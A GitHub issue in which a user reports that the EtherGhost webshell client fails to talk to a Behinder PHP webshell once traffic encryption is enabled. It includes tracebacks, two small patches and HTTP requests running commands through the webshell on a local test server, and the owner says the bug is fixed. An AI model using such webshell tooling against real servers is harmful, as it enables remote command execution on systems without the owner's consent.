Behinder webshell: functionality breaks when traffic encryption is enabled #14

Open
yihijof407 opened this issue Jan 17, 2025 · 1 comment

@yihijof407

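Installed the latest version.
Environment: PHP 8.0.1 and 8.4.1, https://github.com/IshtarStar/docker-compose-nginx-phpfpm

The webshell is https://github.com/Marven11/EtherGhost/blob/main/test_environment/behinder.php
With the default configuration, connecting fails with the following error: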

  File "/home/kali/EtherGhost/ether_ghost/core/php_session_common.py", line 1360, in submit_unwrapped
    status_code, text = await self.submit_http(payload_encoded)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/EtherGhost/ether_ghost/sessions/php_behinder.py", line 131, in submit_http
    data = behinder_aes(payload, self.key)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/EtherGhost/ether_ghost/sessions/php_behinder.py", line 55, in behinder_aes
    payload_padded = pad(payload, AES.block_size)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/EtherGhost/env/lib/python3.12/site-packages/Crypto/Util/Padding.py", line 64, in pad
    return data_to_pad + padding
           ~~~~~~~~~~~~^~~~~~~~~
TypeError: can only concatenate str (not "bytes") to str

After changing payload_padded = pad(payload, AES.block_size) to payload_padded = pad(payload_bytes, AES.block_size) and connecting again, the following error appears:

gqitoa<br />
<b>Fatal error</b>:  Uncaught TypeError: count(): Argument #1 ($var) must be of type Countable|array, null given in /var/www/html/index.php(24) : eval()'d code(1) : eval()'d code:1
Stack trace:
#0 /var/www/html/index.php(24) : eval()'d code(1) : eval()'d code(1): decoder_echo('lwogpazqaxtz')
#1 /var/www/html/index.php(24) : eval()'d code(1): eval()
#2 /var/www/html/index.php(24): eval()
#3 /var/www/html/index.php(25): C-&gt;__invoke('eval(base64_dec...')
#4 {main}
  thrown in <b>/var/www/html/index.php(24) : eval()'d code(1) : eval()'d code</b> on line <b>1</b><br />

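After changing for($i = 0; $i < count($eg_decoder_hooks); $i ++) {{ to for($i = 0; $i < count($eg_decoder_hooks ?? []); $i ++) {{
it works normally, but it breaks once traffic encryption is enabled.
The requests and responses are as follows: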

GET /session/bc28ec3f-5e88-4920-98e6-8a67a16b2e5d/execute_cmd?cmd=pwd HTTP/1.1

{"code":-600,"msg":"受控端输出错误: 解密失败"}
POST / HTTP/1.1
Host: localhost
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3
Cookie: PHPSESSID=07d1e64014c5676836b54b4e76de668c
Content-Length: 2688




HTTP/1.1 200 OK
Server: nginx/1.27.3
Date: Fri, 17 Jan 2025 01:48:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.0.1
Set-Cookie: PHPSESSID=07d1e64014c5676836b54b4e76de668c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 26


qnzbfj/var/www/html
faywun
Marven11 added a commit that referenced this issue Jan 17, 2025
@Marven11
Owner

Fixed; it will be released in the next version.
